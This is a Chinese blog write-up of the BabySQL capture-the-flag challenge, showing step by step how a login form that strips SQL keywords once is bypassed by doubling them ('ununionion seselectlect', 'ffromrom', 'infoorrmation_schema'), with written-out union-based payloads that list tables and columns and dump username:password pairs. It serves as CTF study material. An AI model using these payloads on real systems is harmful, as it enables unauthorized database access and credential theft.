当前位置: 首页 > news >正文

[极客大挑战 2019]BabySQL

news 来源:原创 2024/5/5 18:06:10

尝试万能密码

发现or被过滤了,被替换为空

我们可以这样绕过

发现可以登录成功

接下来就可以爆字段数了

发现报错

猜测by也被置空

尝试

 

 

 

说明字段数为3

输入

1' union select 1,2,database()#

发现也报错了,可能是过滤了union select

尝试

1' unionaa bbselect 1,2,database()#

发现

 

确实过滤了

尝试

1' ununionion seselectlect 1,2,database()#

得到数据库

爆破数据表

1' ununionion seselectlect 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#

  

发现被过滤了

通过尝试,发现过滤了from和where,当然还要注意information中的or

1' ununionion seselectlect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables whwhereere table_schema='geek'#

爆破列

1' ununionion seselectlect 1,2,group_concat(column_name) ffromrom infoorrmation_schema.columns whwhereere table_name='b4bsql'#

 查询数据

1' ununionion seselectlect 1,2,group_concat(username,':',passwoorrd) ffromrom b4bsql#

得到flag

 

相关文章:

  • vue3+vite+windicss+element-plus+axios+router+cookies 搭建
  • ElasticSearch docker 方式安装
  • Spring——IOC 操作 Bean 管理(FactoryBean,作用域以及bean生命周期)
  • java毕业设计成品源码网站基于javaWeb停车场车辆管理系统的设计与实现|车位
  • 【Python零基础入门篇 · 5】:占位符和格式化输入输出、标识符和保留字
  • L77.linux命令每日一练 -- 第11章 Linux系统管理命令 -- vmstat和mpstat
  • 如何安装GCC?
  • latex(overleaf)制作ppt(演示文稿)笔记
  • C#:实现将整数转换为二进制表示形式的字符串算法(附完整源码)
  • .NET C#版本和.NET版本以及VS版本的对应关系
  • C#:实现KochSnowflake科赫雪花算法(附完整源码)
  • vim YouCompleteMe报错:version `GLIBCXX_3.4.20‘ not found 解决方法
  • 数字藏品和NFT有什么区别?
  • 【Python零基础入门篇 · 4】:字符串的运算符、下标和切片
  • 【ElasticSearch】6亿文档存储的ES集群调优实战
  • [Vue CLI 3] 配置解析之 css.extract
  • 8年软件测试工程师感悟——写给还在迷茫中的朋友
  • CoolViewPager:即刻刷新,自定义边缘效果颜色,双向自动循环,内置垂直切换效果,想要的都在这里...
  • Electron入门介绍
  • Javascript弹出层-初探
  • Java深入 - 深入理解Java集合
  • Mithril.js 入门介绍
  • react-core-image-upload 一款轻量级图片上传裁剪插件
  • Redis 中的布隆过滤器
  • Spark VS Hadoop:两大大数据分析系统深度解读
  • 猴子数据域名防封接口降低小说被封的风险
  • 聚类分析——Kmeans
  • 山寨一个 Promise
  • 深入 Nginx 之配置篇
  • 微信小程序--------语音识别(前端自己也能玩)
  • 你对linux中grep命令知道多少?
  • 【运维趟坑回忆录】vpc迁移 - 吃螃蟹之路
  • 教程:使用iPhone相机和openCV来完成3D重建(第一部分) ...
  • ​软考-高级-系统架构设计师教程(清华第2版)【第1章-绪论-思维导图】​
  • # 睡眠3秒_床上这样睡觉的人,睡眠质量多半不好
  • #经典论文 异质山坡的物理模型 2 有效导水率
  • (2)nginx 安装、启停
  • (Ruby)Ubuntu12.04安装Rails环境
  • (读书笔记)Javascript高级程序设计---ECMAScript基础
  • (附源码)ssm基于微信小程序的疫苗管理系统 毕业设计 092354
  • (含react-draggable库以及相关BUG如何解决)固定在左上方某盒子内(如按钮)添加可拖动功能,使用react hook语法实现
  • (介绍与使用)物联网NodeMCUESP8266(ESP-12F)连接新版onenet mqtt协议实现上传数据(温湿度)和下发指令(控制LED灯)
  • (一) springboot详细介绍
  • (一)Java算法:二分查找
  • (轉貼) 蒼井そら挑戰筋肉擂台 (Misc)
  • .gitattributes 文件
  • .NET 除了用 Task 之外,如何自己写一个可以 await 的对象?
  • .net 后台导出excel ,word
  • .net 写了一个支持重试、熔断和超时策略的 HttpClient 实例池
  • .NET的数据绑定
  • .NET和.COM和.CN域名区别
  • /usr/local/nginx/logs/nginx.pid failed (2: No such file or directory)
  • @synthesize和@dynamic分别有什么作用?
  • [100天算法】-目标和(day 79)
  • [2016.7 day.5] T2